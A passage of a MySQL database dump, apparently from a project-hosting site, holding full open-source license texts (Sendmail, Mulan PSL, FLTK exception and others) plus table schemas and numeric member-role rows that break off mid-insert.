CoSMIC(TM), Washington University,\nUC Irvine, and Vanderbilt University, may not be used to endorse or promote\nproducts or services derived from this source without express written permission\nfrom Washington University, UC Irvine, or Vanderbilt University. This license\ngrants no permission to call products or services derived from this source\nACE(TM), TAO(TM), CIAO(TM), DAnCE(TM), or CoSMIC(TM), nor does it grant permission\nfor the name Washington University, UC Irvine, or Vanderbilt University to\nappear in their names.\n\nIf you have any suggestions, additions, comments, or questions, please let\nme know.\n\nDouglas C. Schmidt\n','2020-08-04 08:07:03','2020-08-04 08:07:03',0),(354,'EFL-1.0','Eiffel Forum License, version 1\n\nPermission is hereby granted to use, copy, modify and/or distribute this package,\nprovided that:\n\n - copyright notices are retained unchanged\n\n- any distribution of this package, whether modified or not, includes this\nfile\n\nPermission is hereby also granted to distribute binary programs which depend\non this package, provided that:\n\n- if the binary program depends on a modified version of this package, you\nmust publicly release the modified version of this package\n\nTHIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY. ANY EXPRESS OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\nAUTHORS BE LIABLE TO ANY PARTY FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THIS\nPACKAGE.\n','2020-08-04 08:07:03','2020-08-04 08:07:03',0),(355,'FLTK-exception','The FLTK library and included programs are provided under the terms of the GNU Library General Public License (LGPL) with the following exceptions:\n\nModifications to the FLTK configure script, config header file, and makefiles by themselves to support a specific platform do not constitute a modified or derivative work.\n\nThe authors do request that such modifications be contributed to the FLTK project - send all contributions to \"fltk-bugs@fltk.org\".\n\nWidgets that are subclassed from FLTK widgets do not constitute a derivative work.\n\nStatic linking of applications and widgets to the FLTK library does not constitute a derivative work and does not require the author to provide source code for the application or widget, use the shared FLTK libraries, or link their applications or widgets against a user-supplied version of FLTK.\n\nIf you link the application or widget to a modified version of FLTK, then the changes to FLTK must be provided under the terms of the LGPL in sections 1, 2, and 4.\n\nYou do not have to provide a copy of the FLTK license with programs that are linked to the FLTK library, nor do you have to identify the FLTK license in your program or documentation as required by section 6 of the LGPL.\n\nHowever, programs must still identify their use of FLTK. The following example statement can be included in user documentation to satisfy this requirement:\n\n[program/widget] is based in part on the work of the FLTK project (http://www.fltk.org).\n','2020-08-04 08:07:03','2020-08-04 08:07:03',0),(356,'Sendmail','SENDMAIL LICENSE The following license terms and conditions apply, unless\na redistribution agreement or other license is obtained from Sendmail, Inc.,\n6475 Christie Ave, Third Floor, Emeryville, CA 94608, USA, or by electronic\nmail at license@sendmail.com.\n\nLicense Terms:\n\nUse, Modification and Redistribution (including distribution of any modified\nor derived work) in source and binary forms is permitted only if each of the\nfollowing conditions is met:\n\n1. Redistributions qualify as \"freeware\" or \"Open Source Software\" under one\nof the following terms:\n\n(a) Redistributions are made at no charge beyond the reasonable cost of materials\nand delivery.\n\n(b) Redistributions are accompanied by a copy of the Source Code or by an\nirrevocable offer to provide a copy of the Source Code for up to three years\nat the cost of materials and delivery. Such redistributions must allow further\nuse, modification, and redistribution of the Source Code under substantially\nthe same terms as this license. For the purposes of redistribution \"Source\nCode\" means the complete compilable and linkable source code of sendmail including\nall modifications.\n\n2. Redistributions of Source Code must retain the copyright notices as they\nappear in each Source Code file, these license terms, and the disclaimer/limitation\nof liability set forth as paragraph 6 below.\n\n3. Redistributions in binary form must reproduce the Copyright Notice, these\nlicense terms, and the disclaimer/limitation of liability set forth as paragraph\n6 below, in the documentation and/or other materials provided with the distribution.\nFor the purposes of binary distribution the \"Copyright Notice\" refers to the\nfollowing language:\n\n \"Copyright (c) 1998-2010 Sendmail, Inc. All rights reserved.\"\n\n4. Neither the name of Sendmail, Inc. nor the University of California nor\nnames of their contributors may be used to endorse or promote products derived\nfrom this software without specific prior written permission. The name \"sendmail\"\nis a trademark of Sendmail, Inc.\n\n5. All redistributions must comply with the conditions imposed by the University\nof California on certain embedded code, which copyright Notice and conditions\nfor redistribution are as follows:\n\n(a) Copyright (c) 1988, 1993 The Regents of the University of California.\nAll rights reserved.\n\n(b) Redistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n(i) Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n(ii) Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n(iii) Neither the name of the University nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\n6. Disclaimer/Limitation of Liability: THIS SOFTWARE IS PROVIDED BY SENDMAIL,\nINC. AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL SENDMAIL, INC.,\nTHE REGENTS OF THE UNIVERSITY OF CALIFORNIA OR CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. $Revision: 8.16\n$, Last updated $Date: 2010/10/25 23:11:19 $, Document 139848.1\n','2020-08-04 08:07:03','2020-08-04 08:07:03',0),(357,'Spencer-94','Copyright 1992, 1993, 1994 Henry Spencer. All rights reserved.\n\nThis software is not subject to any license of the American Telephone and\nTelegraph Company or of the Regents of the University of California.\n\nPermission is granted to anyone to use this software for any purpose on any\ncomputer system, and to alter it and redistribute it, subject to the following\nrestrictions:\n\n1. The author is not responsible for the consequences of use of this software,\nno matter how awful, even if they arise from flaws in it.\n\n2. The origin of this software must not be misrepresented, either by explicit\nclaim or by omission. Since few users ever read sources, credits must appear\nin the documentation.\n\n3. Altered versions must be plainly marked as such, and must not be misrepresented\nas being the original software. Since few users ever read sources, credits\nmust appear in the documentation.\n\n 4. This notice may not be removed or altered.\n','2020-08-04 08:07:03','2020-08-04 08:07:03',0),(358,'MulanPSL-2.0','木兰宽松许可证, 第2版\r\n\r\n2020年1月 http://license.coscl.org.cn/MulanPSL2\r\n\r\n您对“软件”的复制、使用、修改及分发受木兰宽松许可证,第2版(“本许可证”)的如下条款的约束:\r\n\r\n0. 定义\r\n\r\n“软件” 是指由“贡献”构成的许可在“本许可证”下的程序和相关文档的集合。\r\n\r\n“贡献” 是指由任一“贡献者”许可在“本许可证”下的受版权法保护的作品。\r\n\r\n“贡献者” 是指将受版权法保护的作品许可在“本许可证”下的自然人或“法人实体”。\r\n\r\n“法人实体” 是指提交贡献的机构及其“关联实体”。\r\n\r\n“关联实体” 是指,对“本许可证”下的行为方而言,控制、受控制或与其共同受控制的机构,此处的控制是指有受控方或共同受控方至少50%直接或间接的投票权、资金或其他有价证券。\r\n\r\n1. 授予版权许可\r\n\r\n每个“贡献者”根据“本许可证”授予您永久性的、全球性的、免费的、非独占的、不可撤销的版权许可,您可以复制、使用、修改、分发其“贡献”,不论修改与否。\r\n\r\n2. 授予专利许可\r\n\r\n每个“贡献者”根据“本许可证”授予您永久性的、全球性的、免费的、非独占的、不可撤销的(根据本条规定撤销除外)专利许可,供您制造、委托制造、使用、许诺销售、销售、进口其“贡献”或以其他方式转移其“贡献”。前述专利许可仅限于“贡献者”现在或将来拥有或控制的其“贡献”本身或其“贡献”与许可“贡献”时的“软件”结合而将必然会侵犯的专利权利要求,不包括对“贡献”的修改或包含“贡献”的其他结合。如果您或您的“关联实体”直接或间接地,就“软件”或其中的“贡献”对任何人发起专利侵权诉讼(包括反诉或交叉诉讼)或其他专利维权行动,指控其侵犯专利权,则“本许可证”授予您对“软件”的专利许可自您提起诉讼或发起维权行动之日终止。\r\n\r\n3. 无商标许可\r\n\r\n“本许可证”不提供对“贡献者”的商品名称、商标、服务标志或产品名称的商标许可,但您为满足第4条规定的声明义务而必须使用除外。\r\n\r\n4. 分发限制\r\n\r\n您可以在任何媒介中将“软件”以源程序形式或可执行形式重新分发,不论修改与否,但您必须向接收者提供“本许可证”的副本,并保留“软件”中的版权、商标、专利及免责声明。\r\n\r\n5. 免责声明与责任限制\r\n\r\n“软件”及其中的“贡献”在提供时不带任何明示或默示的担保。在任何情况下,“贡献者”或版权所有者不对任何人因使用“软件”或其中的“贡献”而引发的任何直接或间接损失承担责任,不论因何种原因导致或者基于何种法律理论,即使其曾被建议有此种损失的可能性。\r\n\r\n6. 语言\r\n\r\n“本许可证”以中英文双语表述,中英文版本具有同等法律效力。如果中英文版本存在任何冲突不一致,以中文版为准。\r\n\r\n条款结束\r\n\r\n如何将木兰宽松许可证,第2版,应用到您的软件\r\n\r\n如果您希望将木兰宽松许可证,第2版,应用到您的新软件,为了方便接收者查阅,建议您完成如下三步:\r\n\r\n1, 请您补充如下声明中的空白,包括软件名、软件的首次发表年份以及您作为版权人的名字;\r\n\r\n2, 请您在软件包的一级目录下创建以“LICENSE”为名的文件,将整个许可证文本放入该文件中;\r\n\r\n3, 请将如下声明文本放入每个源文件的头部注释中。\r\n\r\nCopyright (c) [Year] [name of copyright holder]\r\n[Software Name] is licensed under Mulan PSL v2.\r\nYou can use this software according to the terms and conditions of the Mulan PSL v2.\r\nYou may obtain a copy of Mulan PSL v2 at:\r\n http://license.coscl.org.cn/MulanPSL2\r\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND,\r\nEITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,\r\nMERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.\r\nSee the Mulan PSL v2 for more details.\r\nMulan Permissive Software License,Version 2\r\nMulan Permissive Software License,Version 2 (Mulan PSL v2)\r\n\r\nJanuary 2020 http://license.coscl.org.cn/MulanPSL2\r\n\r\nYour reproduction, use, modification and distribution of the Software shall be subject to Mulan PSL v2 (this License) with the following terms and conditions:\r\n\r\n0. Definition\r\n\r\nSoftware means the program and related documents which are licensed under this License and comprise all Contribution(s).\r\n\r\nContribution means the copyrightable work licensed by a particular Contributor under this License.\r\n\r\nContributor means the Individual or Legal Entity who licenses its copyrightable work under this License.\r\n\r\nLegal Entity means the entity making a Contribution and all its Affiliates.\r\n\r\nAffiliates means entities that control, are controlled by, or are under common control with the acting entity under this License, ‘control’ means direct or indirect ownership of at least fifty percent (50%) of the voting power, capital or other securities of controlled or commonly controlled entity.\r\n\r\n1. Grant of Copyright License\r\n\r\nSubject to the terms and conditions of this License, each Contributor hereby grants to you a perpetual, worldwide, royalty-free, non-exclusive, irrevocable copyright license to reproduce, use, modify, or distribute its Contribution, with modification or not.\r\n\r\n2. Grant of Patent License\r\n\r\nSubject to the terms and conditions of this License, each Contributor hereby grants to you a perpetual, worldwide, royalty-free, non-exclusive, irrevocable (except for revocation under this Section) patent license to make, have made, use, offer for sale, sell, import or otherwise transfer its Contribution, where such patent license is only limited to the patent claims owned or controlled by such Contributor now or in future which will be necessarily infringed by its Contribution alone, or by combination of the Contribution with the Software to which the Contribution was contributed. The patent license shall not apply to any modification of the Contribution, and any other combination which includes the Contribution. If you or your Affiliates directly or indirectly institute patent litigation (including a cross claim or counterclaim in a litigation) or other patent enforcement activities against any individual or entity by alleging that the Software or any Contribution in it infringes patents, then any patent license granted to you under this License for the Software shall terminate as of the date such litigation or activity is filed or taken.\r\n\r\n3. No Trademark License\r\n\r\nNo trademark license is granted to use the trade names, trademarks, service marks, or product names of Contributor, except as required to fulfill notice requirements in section 4.\r\n\r\n4. Distribution Restriction\r\n\r\nYou may distribute the Software in any medium with or without modification, whether in source or executable forms, provided that you provide recipients with a copy of this License and retain copyright, patent, trademark and disclaimer statements in the Software.\r\n\r\n5. Disclaimer of Warranty and Limitation of Liability\r\n\r\nTHE SOFTWARE AND CONTRIBUTION IN IT ARE PROVIDED WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED. IN NO EVENT SHALL ANY CONTRIBUTOR OR COPYRIGHT HOLDER BE LIABLE TO YOU FOR ANY DAMAGES, INCLUDING, BUT NOT LIMITED TO ANY DIRECT, OR INDIRECT, SPECIAL OR CONSEQUENTIAL DAMAGES ARISING FROM YOUR USE OR INABILITY TO USE THE SOFTWARE OR THE CONTRIBUTION IN IT, NO MATTER HOW IT’S CAUSED OR BASED ON WHICH LEGAL THEORY, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\r\n\r\n6. Language\r\n\r\nTHIS LICENSE IS WRITTEN IN BOTH CHINESE AND ENGLISH, AND THE CHINESE VERSION AND ENGLISH VERSION SHALL HAVE THE SAME LEGAL EFFECT. IN THE CASE OF DIVERGENCE BETWEEN THE CHINESE AND ENGLISH VERSIONS, THE CHINESE VERSION SHALL PREVAIL.\r\n\r\nEND OF THE TERMS AND CONDITIONS\r\n\r\nHow to Apply the Mulan Permissive Software License,Version 2 (Mulan PSL v2) to Your Software\r\n\r\nTo apply the Mulan PSL v2 to your work, for easy identification by recipients, you are suggested to complete following three steps:\r\n\r\nFill in the blanks in following statement, including insert your software name, the year of the first publication of your software, and your name identified as the copyright owner;\r\nCreate a file named \"LICENSE\" which contains the whole context of this License in the first directory of your software package;\r\nAttach the statement to the appropriate annotated syntax at the beginning of each source file.\r\nCopyright (c) [Year] [name of copyright holder]\r\n[Software Name] is licensed under Mulan PSL v2.\r\nYou can use this software according to the terms and conditions of the Mulan PSL v2.\r\nYou may obtain a copy of Mulan PSL v2 at:\r\n http://license.coscl.org.cn/MulanPSL2\r\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND,\r\nEITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,\r\nMERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.\r\nSee the Mulan PSL v2 for more details.','2020-09-27 02:52:34','2020-09-27 02:52:34',0),(359,'MulanPSL-1.0','木兰宽松许可证, 第1版\r\n\r\n2019年8月 http://license.coscl.org.cn/MulanPSL\r\n\r\n您对“软件”的复制、使用、修改及分发受木兰宽松许可证,第1版(“本许可证”)的如下条款的约束:\r\n\r\n0. 定义\r\n\r\n“软件”是指由“贡献”构成的许可在“本许可证”下的程序和相关文档的集合。\r\n\r\n“贡献者”是指将受版权法保护的作品许可在“本许可证”下的自然人或“法人实体”。\r\n\r\n“法人实体”是指提交贡献的机构及其“关联实体”。\r\n\r\n“关联实体”是指,对“本许可证”下的一方而言,控制、受控制或与其共同受控制的机构,此处的控制是指有受控方或共同受控方至少50%直接或间接的投票权、资金或其他有价证券。\r\n\r\n“贡献”是指由任一“贡献者”许可在“本许可证”下的受版权法保护的作品。\r\n\r\n1. 授予版权许可\r\n\r\n每个“贡献者”根据“本许可证”授予您永久性的、全球性的、免费的、非独占的、不可撤销的版权许可,您可以复制、使用、修改、分发其“贡献”,不论修改与否。\r\n\r\n2. 授予专利许可\r\n\r\n每个“贡献者”根据“本许可证”授予您永久性的、全球性的、免费的、非独占的、不可撤销的(根据本条规定撤销除外)专利许可,供您制造、委托制造、使用、许诺销售、销售、进口其“贡献”或以其他方式转移其“贡献”。前述专利许可仅限于“贡献者”现在或将来拥有或控制的其“贡献”本身或其“贡献”与许可“贡献”时的“软件”结合而将必然会侵犯的专利权利要求,不包括仅因您或他人修改“贡献”或其他结合而将必然会侵犯到的专利权利要求。如您或您的“关联实体”直接或间接地(包括通过代理、专利被许可人或受让人),就“软件”或其中的“贡献”对任何人发起专利侵权诉讼(包括反诉或交叉诉讼)或其他专利维权行动,指控其侵犯专利权,则“本许可证”授予您对“软件”的专利许可自您提起诉讼或发起维权行动之日终止。\r\n\r\n3. 无商标许可\r\n\r\n“本许可证”不提供对“贡献者”的商品名称、商标、服务标志或产品名称的商标许可,但您为满足第4条规定的声明义务而必须使用除外。\r\n\r\n4. 分发限制\r\n\r\n您可以在任何媒介中将“软件”以源程序形式或可执行形式重新分发,不论修改与否,但您必须向接收者提供“本许可证”的副本,并保留“软件”中的版权、商标、专利及免责声明。\r\n\r\n5. 免责声明与责任限制\r\n\r\n“软件”及其中的“贡献”在提供时不带任何明示或默示的担保。在任何情况下,“贡献者”或版权所有者不对任何人因使用“软件”或其中的“贡献”而引发的任何直接或间接损失承担责任,不论因何种原因导致或者基于何种法律理论,即使其曾被建议有此种损失的可能性。\r\n\r\n条款结束\r\n\r\n如何将木兰宽松许可证,第1版,应用到您的软件\r\n\r\n如果您希望将木兰宽松许可证,第1版,应用到您的新软件,为了方便接收者查阅,建议您完成如下三步:\r\n\r\n1, 请您补充如下声明中的空白,包括软件名、软件的首次发表年份以及您作为版权人的名字;\r\n\r\n2, 请您在软件包的一级目录下创建以“LICENSE”为名的文件,将整个许可证文本放入该文件中;\r\n\r\n3, 请将如下声明文本放入每个源文件的头部注释中。\r\n\r\nCopyright (c) [2019] [name of copyright holder]\r\n[Software Name] is licensed under the Mulan PSL v1.\r\nYou can use this software according to the terms and conditions of the Mulan PSL v1.\r\nYou may obtain a copy of Mulan PSL v1 at:\r\n http://license.coscl.org.cn/MulanPSL\r\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR\r\nPURPOSE.\r\nSee the Mulan PSL v1 for more details.\r\nMulan Permissive Software License,Version 1\r\nMulan Permissive Software License,Version 1 (Mulan PSL v1)\r\n\r\nAugust 2019 http://license.coscl.org.cn/MulanPSL\r\n\r\nYour reproduction, use, modification and distribution of the Software shall be subject to Mulan PSL v1 (this License) with following terms and conditions:\r\n\r\n0. Definition\r\n\r\nSoftware means the program and related documents which are comprised of those Contribution and licensed under this License.\r\n\r\nContributor means the Individual or Legal Entity who licenses its copyrightable work under this License.\r\n\r\nLegal Entity means the entity making a Contribution and all its Affiliates.\r\n\r\nAffiliates means entities that control, or are controlled by, or are under common control with a party to this License, ‘control’ means direct or indirect ownership of at least fifty percent (50%) of the voting power, capital or other securities of controlled or commonly controlled entity.\r\n\r\nContribution means the copyrightable work licensed by a particular Contributor under this License.\r\n\r\n1. Grant of Copyright License\r\n\r\nSubject to the terms and conditions of this License, each Contributor hereby grants to you a perpetual, worldwide, royalty-free, non-exclusive, irrevocable copyright license to reproduce, use, modify, or distribute its Contribution, with modification or not.\r\n\r\n2. Grant of Patent License\r\n\r\nSubject to the terms and conditions of this License, each Contributor hereby grants to you a perpetual, worldwide, royalty-free, non-exclusive, irrevocable (except for revocation under this Section) patent license to make, have made, use, offer for sale, sell, import or otherwise transfer its Contribution where such patent license is only limited to the patent claims owned or controlled by such Contributor now or in future which will be necessarily infringed by its Contribution alone, or by combination of the Contribution with the Software to which the Contribution was contributed, excluding of any patent claims solely be infringed by your or others’ modification or other combinations. If you or your Affiliates directly or indirectly (including through an agent, patent licensee or assignee), institute patent litigation (including a cross claim or counterclaim in a litigation) or other patent enforcement activities against any individual or entity by alleging that the Software or any Contribution in it infringes patents, then any patent license granted to you under this License for the Software shall terminate as of the date such litigation or activity is filed or taken.\r\n\r\n3. No Trademark License\r\n\r\nNo trademark license is granted to use the trade names, trademarks, service marks, or product names of Contributor, except as required to fulfill notice requirements in section 4.\r\n\r\n4. Distribution Restriction\r\n\r\nYou may distribute the Software in any medium with or without modification, whether in source or executable forms, provided that you provide recipients with a copy of this License and retain copyright, patent, trademark and disclaimer statements in the Software.\r\n\r\n5. Disclaimer of Warranty and Limitation of Liability\r\n\r\nThe Software and Contribution in it are provided without warranties of any kind, either express or implied. In no event shall any Contributor or copyright holder be liable to you for any damages, including, but not limited to any direct, or indirect, special or consequential damages arising from your use or inability to use the Software or the Contribution in it, no matter how it’s caused or based on which legal theory, even if advised of the possibility of such damages.\r\n\r\nEnd of the Terms and Conditions\r\n\r\nHow to apply the Mulan Permissive Software License,Version 1 (Mulan PSL v1) to your software\r\n\r\nTo apply the Mulan PSL v1 to your work, for easy identification by recipients, you are suggested to complete following three steps:\r\n\r\nFill in the blanks in following statement, including insert your software name, the year of the first publication of your software, and your name identified as the copyright owner;\r\nCreate a file named “LICENSE” which contains the whole context of this License in the first directory of your software package;\r\nAttach the statement to the appropriate annotated syntax at the beginning of each source file.\r\nCopyright (c) [2019] [name of copyright holder]\r\n[Software Name] is licensed under the Mulan PSL v1.\r\nYou can use this software according to the terms and conditions of the Mulan PSL v1.\r\nYou may obtain a copy of Mulan PSL v1 at:\r\n http://license.coscl.org.cn/MulanPSL\r\nTHIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR\r\nPURPOSE.\r\nSee the Mulan PSL v1 for more details.','2020-09-27 02:52:54','2020-09-27 02:52:54',0),(360,'PHengLEI','本协议是您(如下也称\"用户\")与中国空气动力研究与发展中心(以下简称\"中心\"),关于国家数值风洞(NNW)\"风雷(PHengLEI)\"软件的协议,请认真阅读.\r\n\r\n\r\n1. 申请者不得私自以拷贝、刻录等方式向第三者(包括同一单位内的其他人员)传播。所有用户均需填写本协议,向中心申请并获授权后方能免费获取.\r\n\r\n2. 用户可以在\"风雷(PHengLEI)\"软件上添加、修改源代码,有权提出软件的使用反馈及意见,用户可以发表软件的使用体验及感受,但不得随意诽谤、中伤.\r\n\r\n3. 用户享有其开发代码的知识产权。鼓励将开发成果返回至开发团队,或在\"风雷(PHengLEI)\"软件中开源,开发者将在代码中署名.\r\n\r\n4. 若该软件被申请人用于学术研究,则相关论文成果中应引用国家数值风洞\"风雷(PHengLEI)\"软件; 若用于其它用途,需在显要处标注基于\"风雷(PHengLEI)\"软件开发.\r\n\r\n5. 一旦申请使用本软件,即表示同意接受协议各项条件的约束。如果您不同意协议的条件,则不能获得使用本软件的权利.\r\n\r\n6. \"风雷(PHengLEI)\"软件由中心开发,一切知识产权,以及与软件相关的所有信息内容,包括但不限于:文字表述及其组合、图标、图饰、图表、色彩、版面框架、有关数据、印刷材料、或电子文档等均受《中华人民共和国著作权法》、《中华人民共和国计算机软件保护条例》、《中华人民共和国商标法》、《中华人民共和国专利法》、反不正当竞争法和相应的国际条约以及其他知识产权法律法规的保护,除涉及第三方授权的软件或技术外,中心享有上述知识产权.\r\n\r\n7. 您获得的只是本软件的使用权。本软件仅限中华人民共和国公民申请使用.\r\n\r\n8. 本协议的最终解释权归中心.\r\n','2020-12-29 03:52:39','2020-12-29 03:55:56',1);
|
||
/*!40000 ALTER TABLE `licenses` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `mark_downs`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `mark_downs`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `mark_downs` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`description` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `mark_downs`
|
||
--
|
||
|
||
LOCK TABLES `mark_downs` WRITE;
|
||
/*!40000 ALTER TABLE `mark_downs` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `mark_downs` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `member_roles`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `member_roles`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `member_roles` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`member_id` int(11) NOT NULL,
|
||
`role_id` int(11) NOT NULL,
|
||
`inherited_from` int(11) DEFAULT NULL,
|
||
`is_current` int(11) DEFAULT '1',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_member_roles_on_member_id` (`member_id`),
|
||
KEY `index_member_roles_on_role_id` (`role_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=792 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `member_roles`
|
||
--
|
||
|
||
LOCK TABLES `member_roles` WRITE;
|
||
/*!40000 ALTER TABLE `member_roles` DISABLE KEYS */;
|
||
INSERT INTO `member_roles` VALUES (27,27,3,NULL,1),(30,30,3,NULL,1),(31,31,3,NULL,1),(33,33,3,NULL,1),(34,34,3,NULL,1),(36,36,3,NULL,1),(39,39,3,NULL,1),(42,42,3,NULL,1),(45,45,3,NULL,1),(46,46,3,NULL,1),(47,47,3,NULL,1),(58,58,3,NULL,1),(61,61,3,NULL,1),(62,62,3,NULL,1),(63,63,3,NULL,1),(64,64,3,NULL,1),(65,65,3,NULL,1),(66,66,3,NULL,1),(67,67,3,NULL,1),(68,68,3,NULL,1),(69,69,3,NULL,1),(70,70,3,NULL,1),(71,71,3,NULL,1),(73,73,3,NULL,1),(74,74,3,NULL,1),(77,77,3,NULL,1),(80,80,3,NULL,1),(82,82,3,NULL,1),(83,83,3,NULL,1),(84,84,3,NULL,1),(85,85,3,NULL,1),(86,86,3,NULL,1),(103,103,3,NULL,1),(104,104,3,NULL,1),(105,105,4,NULL,1),(106,106,3,NULL,1),(107,107,3,NULL,1),(108,108,3,NULL,1),(109,109,3,NULL,1),(126,126,3,NULL,1),(133,133,3,NULL,1),(135,135,3,NULL,1),(136,136,3,NULL,1),(137,137,5,NULL,1),(138,138,4,NULL,1),(139,139,3,NULL,1),(140,140,3,NULL,1),(146,145,3,NULL,1),(148,146,4,NULL,1),(152,150,3,NULL,1),(154,152,3,NULL,1),(155,153,3,NULL,1),(156,154,3,NULL,1),(158,156,3,NULL,1),(159,157,3,NULL,1),(169,166,3,NULL,1),(170,167,3,NULL,1),(171,168,3,NULL,1),(172,169,3,NULL,1),(180,175,4,NULL,1),(189,184,3,NULL,1),(190,185,4,NULL,1),(193,188,4,NULL,1),(200,195,3,NULL,1),(208,203,4,NULL,1),(236,231,3,NULL,1),(238,233,4,NULL,1),(247,241,3,NULL,1),(248,242,4,NULL,1),(249,243,3,NULL,1),(250,244,4,NULL,1),(251,245,3,NULL,1),(252,246,3,NULL,1),(270,235,4,NULL,1),(271,264,3,NULL,1),(273,266,3,NULL,1),(277,270,3,NULL,1),(278,271,3,NULL,1),(279,272,3,NULL,1),(280,273,3,NULL,1),(281,274,3,NULL,1),(286,279,3,NULL,1),(287,280,3,NULL,1),(288,281,3,NULL,1),(289,282,4,NULL,1),(309,302,3,NULL,1),(311,236,5,NULL,1),(313,304,3,NULL,1),(314,305,3,NULL,1),(315,306,3,NULL,1),(316,307,3,NULL,1),(317,308,4,NULL,1),(318,309,3,NULL,1),(319,310,3,NULL,1),(320,311,3,NULL,1),(321,312,3,NULL,1),(322,313,3,NULL,1),(323,314,4,NULL,1),(324,315,3,NULL,1),(327,318,4,NULL,1),(329,320,3,NULL,1),(330,321,4,NULL,1),(331,322,4,NULL,1),(332,323,4,NULL,1),(333,324,4,NULL,1),(334,325,4,NULL,1),(335,326,4,NULL,1),(337,327,4,NULL,1),(338,328,4,NULL,1),(339,329,4,NULL,1),(340,330,4,NULL,1),(341,331,4,NULL,1),(342,332,4,NULL,1),(343,333,4,NULL,1),(344,334,4,NULL,1),(345,335,4,NULL,1),(346,336,4,NULL,1),(347,337,4,NULL,1),(348,338,4,NULL,1),(349,339,4,NULL,1),(350,340,4,NULL,1),(351,341,4,NULL,1),(352,342,4,NULL,1),(353,343,4,NULL,1),(354,344,3,NULL,1),(355,345,3,NULL,1),(356,346,3,NULL,1),(357,347,3,NULL,1),(358,348,3,NULL,1),(359,349,3,NULL,1),(360,350,3,NULL,1),(361,351,3,NULL,1),(362,352,3,NULL,1),(363,353,3,NULL,1),(364,354,3,NULL,1),(365,355,4,NULL,1),(367,356,3,NULL,1),(368,357,3,NULL,1),(369,358,5,NULL,1),(371,359,5,NULL,1),(372,360,5,NULL,1),(373,361,5,NULL,1),(374,362,5,NULL,1),(376,363,5,NULL,1),(377,364,5,NULL,1),(378,319,3,NULL,1),(379,365,3,NULL,1),(408,394,4,NULL,1),(412,398,3,NULL,1),(413,399,3,NULL,1),(414,400,3,NULL,1),(415,401,3,NULL,1),(416,402,3,NULL,1),(417,403,3,NULL,1),(418,404,3,NULL,1),(419,405,3,NULL,1),(420,406,3,NULL,1),(421,407,3,NULL,1),(422,408,3,NULL,1),(423,409,3,NULL,1),(424,410,3,NULL,1),(425,411,3,NULL,1),(426,412,3,NULL,1),(427,413,3,NULL,1),(428,414,3,NULL,1),(429,415,3,NULL,1),(430,416,3,NU